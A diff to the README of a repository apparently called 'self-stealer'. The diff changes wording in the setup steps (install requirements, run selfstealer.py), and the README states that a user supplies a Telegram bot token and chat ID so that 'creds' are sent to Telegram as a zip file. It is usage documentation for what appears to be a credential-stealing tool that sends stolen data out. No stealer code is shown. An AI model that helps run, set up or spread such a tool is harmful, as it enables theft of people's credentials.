x5corpion/self-stealer/README.md

 # Go into the repository
 $ cd self-stealer

-# Install dependencies required by the server
+# Install dependencies that are required
 $ pip install -r requirements.txt

-# Start the GUI
+# Start the program
 $ python selfstealer.py

 # You will enter your telegram bot token and chat Id there and creds will be sent to your telegram in zip format